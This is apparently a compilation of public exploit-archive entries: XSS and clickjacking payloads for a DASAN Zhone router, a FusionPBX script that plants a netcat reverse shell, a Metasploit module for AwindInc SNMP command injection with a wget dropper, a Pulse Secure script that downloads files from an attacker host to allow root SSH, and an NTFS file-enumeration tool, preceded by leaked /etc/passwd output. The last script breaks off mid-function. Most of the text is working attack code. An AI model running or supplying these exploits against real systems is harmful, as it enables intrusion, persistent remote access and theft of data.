Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

HTTP/1.1 200 OK
Date: Tue, 03 Sep 2019 17:38:04 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 1738
Connection: close
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
misdn:x:31:31:Modular ISDN:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
uucp:x:10:14:Uucp user:/var/spool/uucp:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
asterisk:x:997:994:Asterisk PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:1000:1000::/home/spamfilter:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
chrony:x:996:993::/var/lib/chrony:/sbin/nologin
cakes:x:1001:1001:cakes:/home/cakes:/bin/bash
  19.
Multiple Cross-Site Scripting (XSS) in the web interface of the DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of unsanitized GET parameters.

# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677

= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp

= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//

= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
  20.
#!/usr/bin/python3
'''
# Exploit Title: FusionPBX v4.4.8 Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
'''

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup

# turn off BeautifulSoup and requests warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 6:
    print(len(sys.argv))
    print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
    print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

request = requests.session()

login_info = {
    "username": username,
    "password": password
}

login_request = request.post(
    url + "/core/user_settings/user_dashboard.php",
    login_info,
    verify=False
)

if "Invalid Username and/or Password" not in login_request.text:
    print("[+] Logged in successfully")
else:
    print("[+] Error with creds")
    exit()

service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"

payload_info = {
    # the service name you want to create
    "service_name": "PwnedService3",
    "service_type": "pid",
    "service_data": "1",
    # this value contains the payload, you can change it as you want
    "service_cmd_start": "rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z",
    "service_cmd_stop": "stop",
    "service_description": "desc",
    "submit": "Save"
}

request.post(service_edit_page, payload_info, verify=False)
html_page = request.get(services_page, verify=False)
soup = BeautifulSoup(html_page.text, "lxml")

# find the id of the service we just created in the services list
sid = None
for a in soup.find_all(href=True):
    if "PwnedService3" in a:
        sid = a["href"].split("=")[1]
        break

if sid is None:
    print("[-] Could not find the created service in the services list")
    exit()

service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit, check your netcat!")
request.get(service_page, verify=False)
  21.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "AwindInc SNMP Service Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs
        are fed to ftpfw.sh system command, leading to command injection. A valid SNMP read-write community
        is required to exploit this vulnerability.

        The following devices are known to be affected by this issue:

          * Crestron Airmedia AM-100 <= version 1.5.0.4
          * Crestron Airmedia AM-101 <= version 2.5.0.12
          * Awind WiPG-1600w <= version 2.0.1.8
          * Awind WiPG-2000d <= version 2.1.6.2
          * Barco wePresent 2000 <= version 2.1.5.7
          * Newline Trucast 2 <= version 2.1.0.5
          * Newline Trucast 3 <= version 2.1.3.7
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Quentin Kaiser <kaiserquentin[at]gmail.com>' ],
      'References'     => [
        ['CVE', '2017-16709'],
        ['URL', 'https://github.com/QKaiser/awind-research'],
        ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
      ],
      'DisclosureDate' => '2019-03-27',
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'     => true,
      'Targets'        => [
        ['Unix In-Memory',
          'Platform' => 'unix',
          'Arch'     => ARCH_CMD,
          'Type'     => :unix_memory,
          'Payload'  => { 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'} }
        ],
        ['Linux Dropper',
          'Platform'        => 'linux',
          'Arch'            => ARCH_ARMLE,
          'CmdStagerFlavor' => %w[wget],
          'Type'            => :linux_dropper
        ]
      ],
      'DefaultTarget'  => 1,
      'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}))

    register_options(
      [
        OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
      ])
  end

  def check
    begin
      connect_snmp
      sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
      print_status("Target system is #{sys_description}")
      # AM-100 and AM-101 considered EOL, no fix so no need to check version.
      model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
      case model
      when 'AM-100', 'AM-101'
        return CheckCode::Vulnerable
      else
        # TODO: insert description check for other vulnerable models (that I don't have)
        # In the meantime, we return 'safe'.
        return CheckCode::Safe
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
    Exploit::CheckCode::Unknown
  end

  def inject_payload(cmd)
    begin
      connect_snmp
      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0], SNMP::OctetString.new(cmd))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Injection successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  def trigger
    begin
      connect_snmp
      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0], SNMP::Integer32.new(1))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Trigger successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, opts = {})
    # The payload must start with a valid FTP URI otherwise the injection point is not reached
    cmd = "ftp://1.1.1.1/$(#{cmd.to_s})"
    # When the FTP download fails, the script calls /etc/reboot.sh and we lose the callback
    # We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and
    # keep our reverse shell opened :)
    cmd << "$(pkill -f /etc/reboot.sh)"
    # the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad
    cmd << "A" * (255 - cmd.length)
    # we inject our payload in camFWUpgradeFTPURL
    print_status("Injecting payload")
    inject_payload(cmd)
    # we trigger the firmware download via FTP, which will end up calling this
    # "/bin/getRemoteURL.sh %s %s %s %d"
    print_status("Triggering call")
    trigger
  end
end
  22.
#!/usr/bin/python
#
# Exploit Title: Pulse Secure Post-Auth Remote Code Execution
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 09/05/2019
# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_)
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: linux
# CVE : CVE-2019-11539
#
# Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_)
#
# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN
# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root.
# You will need your own configuration and authorized_keys files.
#
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539
# Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
#
# Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authorization.
# We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free.
#

# Imports
import requests
import urllib
from bs4 import BeautifulSoup

# Host information
host = ''  # Host to exploit
login_url = '/dana-na/auth/url_admin/login.cgi'  # Login page
CMDInjectURL = '/dana-admin/diag/diag.cgi'  # Overwrites the Template when using tcpdump
CommandExecURL = '/dana-na/auth/setcookie.cgi'  # Executes the code

# Login Credentials
user = 'admin'  # Default Username
password = 'password'  # Default Password

# Necessary for Curl
downloadHost = ''  # IP or FQDN for host running webserver
port = ''  # Port where web service is running. Needs to be a string, hence the quotes.

# Proxy Configuration
# Uncomment if you need to use a proxy or for debugging requests
proxies = {
    # 'http': 'http://127.0.0.1:8080',
    # 'https': 'http://127.0.0.1:8080',
}

# Headers for requests
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
}

# Cookies to send with request
cookies = {
    'lastRealm': 'Admin%20Users',
    'DSSIGNIN': 'url_admin',
    'DSSignInURL': '/admin/',
    'DSPERSISTMSG': '',
}

# Data for post request
loginData = {
    'tz_offset': 0,
    'username': user,
    'password': password,
    'realm': 'Admin Users',
    'btnSubmit': 'Sign In',
}

s = requests.Session()  # Sets up the session
s.proxies = proxies  # Sets up the proxies

# Disable Warnings from requests library
requests.packages.urllib3.disable_warnings()


# Administrator Login logic
# Probably wouldn't have figured this out without help from @buffaloverflow
def adminLogin():
    global xsAuth
    global _headers
    # Send the initial request
    r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies)
    print('[#] Logging in...')  # Self Explanatory
    r = s.post('https://' + host + login_url, data=loginData, verify=False, proxies=proxies, allow_redirects=False)  # sends login post request
    print('[#] Sent Login Request...')
    # Login Logic
    if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location", ""):
        referer = 'https://%s%s' % (host, r.headers["location"])  # Gets the referer
        r = s.get(referer, verify=False)  # Sends a get request
        soup = BeautifulSoup(r.text, 'html.parser')  # Sets up HTML Parser
        FormDataStr = soup.find('input', {'id': 'DSIDFormDataStr'})["value"]  # Gets DSIDFormDataStr
        print('[#] Grabbing xsauth...')
        xsAuth = soup.find('input', {'name': 'xsauth'})["value"]  # Gets the cross site auth token
        print('[!] Got xsauth: ' + xsAuth)  # Self Explanatory
        data = {'btnContinue': 'Continue the session', 'FormDataStr': FormDataStr, 'xsauth': xsAuth}  # Submits the continue session page
        _headers = headers  # Sets the headers
        _headers.update({'referer': referer})  # Updates the headers
        r = s.post('https://%s' % (host + login_url), data=data, headers=_headers, verify=False, proxies=proxies)  # Sends a new post request
        print('[+] Logged in!')  # Self Explanatory


# Command injection logic
def cmdInject(command):
    r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies)
    if r.status_code == 200:
        soup = BeautifulSoup(r.text, 'html.parser')  # Sets up HTML Parser
        xsAuth = soup.find('input', {'name': 'xsauth'})["value"]  # Gets the cross site auth token
        payload = {
            'a': 'td',
            'chkInternal': 'On',
            'optIFInternal': 'int0',
            'pmisc': 'on',
            'filter': '',
            'options': '-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' % command,
            'toggle': 'Start+Sniffing',
            'xsauth': xsAuth
        }
        # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie
        DSLaunchURL_cookie = {'DSLaunchURL': (CMDInjectURL + '?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22' + urllib.quote_plus(command) + '%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth=' + xsAuth).encode("hex")}
        # print('[+] Sending Command injection: %s' % command)  # Self Explanatory. Useful for seeing what commands are run
        # Sends the get request to overwrite the template
        r = s.get('https://' + host + CMDInjectURL + '?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22' + command + '%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth=' + xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies)
        # Sends the get request to execute the code
        r = s.get('https://' + host + CommandExecURL, verify=False)


# Main logic
if __name__ == '__main__':
    adminLogin()
    try:
        print('[!] Starting Exploit')
        print('[*] Opening Firewall port...')
        cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT')  # Opens SSH port
        print('[*] Downloading Necessary Files....')
        cmdInject('/home/bin/curl ' + downloadHost + ':' + port + '/cloud_sshd_config -o /tmp/cloud_sshd_config')  # download cloud_sshd_config
        cmdInject('/home/bin/curl ' + downloadHost + ':' + port + '/authorized_keys -o /tmp/authorized_keys')  # download authorized_keys
        print('[*] Backing up Files...')
        cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak')  # backup cloud_sshd_config
        cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak')  # backup authorized_keys
        print('[*] Overwriting Old Files...')
        cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config')  # overwrite cloud_sshd_config
        cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys')  # overwrite authorized_keys
        print('[*] Restarting SSHD...')
        cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")')  # Restart sshd via a SIGHUP
        print('[!] Done Exploiting the system.')
        print('[!] Please use the following command:')
        print('[!] ssh -p6667 root@%s' % host)
    except Exception as e:
        raise
  23.
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows NTFS

NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family.

[Vulnerability Type]
Privileged File Access Enumeration

[CVE Reference]
N/A

[Security Issue]
Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name. This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension or have a "." (dot) as part of the file or folder name.

Typically, you see enumeration in web-application attacks which target account usernames. In this case we are targeting the filenames of other users; maybe we need to locate files up front that we wish to steal, possibly prior to launching say an XXE exploit to steal those files, or maybe we just passively sniff the account's directories to profile the mark and/or learn their daily activities.

Standard account users attempting to open another user's files or folders that do not contain a valid extension or dot "." in the filename are always issued the expected "Access is denied" system error message. However, for files that contain a (dot) in the filename and that also don't exist, the system echoes the following attacker-friendly warning: "The system cannot find the file". This error message inconsistency allows attackers to infer files EXIST, because any other time we would get "The system cannot find the file".

Example: the Windows commands DIR or TYPE always greet attackers with an expected "Access is denied" message, whether the file exists or not. This helps protect users from having their local files known to attackers, since the system returns the same message regardless of whether files exist or not when using those commands. Those commands' output messages are not affected by the file having a valid extension or not.

However, we can bypass that protection by avoiding the Windows DIR or TYPE commands and instead attempt to directly open any inaccessible user's file on the command line, much like calling a program and pressing the enter key. After the Win32 API function CreateFile is called, it returns either:

1) "The system cannot find the file"
2) "Access is denied"

C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact
The system cannot find the file   <==== DOES NOT EXIST

C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact
Access is denied.   <===== EXISTS

C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con
The system cannot find the file   <==== DOES NOT EXIST

C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever
Access is denied.   <===== FALSE POSITIVE, NO EXTENSION PRESENT IN THE FILENAME

From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe or related config files on disk with user-only rights, instead of authenticating with admin rights, as a quick paranoid first pass. Example: if malware hides itself by unlinking itself from the EPROCESS list in memory or using programs like WinRAP to hide processes from Windows TaskMgr, we may not discover them even if using the tasklist command. The EPROCESS structure and flink/blink is how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the malicious code happens to reside on disk and not only in memory. What's cool is we can do this without the need for admin rights.

Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icacls, and cd. However, the Windows commands rename, ren, cacls, type, dir, erase, move or del will issue flat out "Access is denied" messages.

Previously, MSRC recommended using ABE. However, that feature is only for viewing files and folders in a shared folder, not when viewing files or folders in the local file system.

Tested successfully Win7/10

[Exploit/POC]
"NtFileSins.py"

from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2.1
# Added: Check for Zone.Identifier:$DATA to see if any identified files were downloaded from internet.
# Fixed: save() logic to log report in case no Zone.Identifiers found.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by comparing inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
#               2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by comparing ntfs error messages to potentially learn their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
#
#======================================================================#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1   #
# By John Page (aka hyp3rlinx)                                          #
# Apparition Security                                                   #
#======================================================================#

BANNER='''
    _   _______________ __    _____ _
   / | / /_  __/ ____(_) /__ / ___/(_)___  _____
  /  |/ / / / / /_  / / / _ \\__ \/ / __ \/ ___/
 / /|  / / / / __/ / / /  __/__/ / / / / (__  )
/_/ |_/ /_/ /_/   /_/_/\___/____/_/_/ /_/____/

v2.1 By hyp3rlinx ApparitionSec
'''

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"
USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
           "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]
APPDATA_DIR=["AppData/Local/Temp"]
EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",
            ".bat",".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])
REPORT="NtFileSins_Log.txt"


def usage():
    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
    print '-u victim -a "<name.ext>"'
    print "-u victim -d Downloads -a <name.ext> -s"
    print '-u victim -d Contacts -a "Mike N.contact"'
    print "-u victim -a APT.txt -b -n"
    print "-u victim -d -z Desktop/MyFiles -a <.name>"
    print "-u victim -d Searches -a <name>.search-ms"
    print "-u victim -d . -a <name.ext>"
    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
    print "-u victim -d Downloads -a APT.exe -b"
    print "-u victim -f list_of_files.txt"
    print "-u victim -f list_of_files.txt -b -s"
    print "-u victim -f list_of_files.txt -x .txt"
    print "-u victim -d desktop -f list_of_files.txt -b"
    print "-u victim -d desktop -f list_of_files.txt -x .rar"
    print "-u victim -z -s -f list_of_files.txt"


def parse_args():
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search <e.g. Downloads>.")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
    parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.")
    parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.")
    parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.")
    parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.")
    parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. <.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.")
    parser.add_argument("-z", "--zone_identifier", nargs="?", const="1", help="Identifies artifacts downloaded from the internet by checking for Zone.Identifier:$DATA.")
    parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT)
    parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.")
    parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.")
    return parser.parse_args()


def access(j):
    # "Open" the path through cmd.exe and return the error text; cmd.exe writes
    # "Access is denied." and "The system cannot find the file" to stderr.
    result=""
    try:
        p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True)
        stdout,stderr = p.communicate()
        result = stderr.strip()
    except Exception as e:
        #print str(e)
        pass
    return result


def artifacts_from_file(artifacts_file, bflag, specific_ext):
    try:
        f=open(artifacts_file, "r")
        for a in f:
            idx = a.rfind(".")
            a = a.strip()
            if a != "":
                if specific_ext:
                    if idx==-1:
                        a = a + specific_ext
                    else:
                        #replace existing ext
                        a = a[:idx] + specific_ext
                ARTIFACTS_SET.add(a)
        f.close()
    except Exception as e:
        print str(e)
        exit()


def save():
    try:
        f=open(REPORT, "w")
        for j in found_set:
            f.write(j+"\n")
        f.close()
    except Exception as e:
        print str(e)


def recon_msg(s):
    if s == 0:
        return "Access is denied."
    else:
        return "\t[*] Artifact exists ==>"


def echo_results(args, res, x, i):
    global sin_cnt
    if res=="":
        print "\t[!] No NTFS message, you must already be admin, then this script is not required."
        exit()
    if "not recognized as an internal or external command" in res:
        print "\t[!] You must target users with higher privileges than yours."
        exit()
    if res != recon_msg(0):
        if args.verbose:
            print "\t"+res
        else:
            if args.notfound:
                print "\t[-] not found: " + x +"/"+ i
    else:
        sin_cnt += 1
        if args.save or args.zone_identifier:
            found_set.add(x+"/"+i)
        if args.verbose:
            print recon_msg(1)+ x+"/"+i
            print "\t"+res
        else:
            print recon_msg(1)+ x+"/"+i


def valid_artifact_name(sin,args):
    idx = "." in sin
    if re.findall(r"[/\\*?:<>|]", sin):
        print "\t[!] Skipping: disallowed file name character."
        return False
    if not idx and not args.built_in_ext and not args.specific_ext:
        print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives."
        print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives."
    if not args.built_in_ext:
        if sin[-1] == ".":
            print "\t[!] Skipping: "+sin+" non valid file name."
            return False
    return True


def search_missing_ext(path,args,i):
    for x in path:
        for e in EXTS:
            res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
            echo_results(args, res, x, i+e)


#Check if the found artifact was downloaded from internet
def zone_identifier_check(args):
    global ROOTDIR, internet_sin_cnt
    zone_set.update(found_set)
    for c in found_set:
        c = c + ZONE_IDENTIFIER
        res = access(ROOTDIR+args.user+"/"+c)
        if res == "Access is denied.":
            internet_sin_cnt += 1
            print "\t[$] Zone Identifier found: "+c+" this file was downloaded over the internet!."
            zone_set.add(c)


def ntsins(path,args,i):
    if i.rfind(".")==-1:
        search_missing_ext(path,args,i)
        i=""
    for x in path:
        if i != "":
            if args.built_in_ext:
                for e in EXTS:
                    res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
                    echo_results(args, res, x, i+e)
            elif args.specific_ext:
                idx = i.rfind(".")
                if idx == -1:
                    i = i + "."
                else:
                    i = i[:idx] + args.specific_ext
            res = access(ROOTDIR+args.user+"/"+x+"/"+i)
            echo_results(args, res, x, i)


def search(args):
    global ROOTDIR, USER_DIRS, ARTIFACTS_SET
    print "\tSearching...\n"
    if args.artifact:
        ARTIFACTS_SET = set([args.artifact])
    for i in ARTIFACTS_SET:
        idx = i.rfind(".") + 1
        if idx and args.built_in_ext:
            i = i[:idx -1:None]
        if len(i) > 0 and i != None:
            if valid_artifact_name(i,args):
                #specific user dir search
                if args.directory:
                    single_dir=[args.directory]
                    ntsins(single_dir,args,i)
                #search appdata dirs
                elif args.appdata:
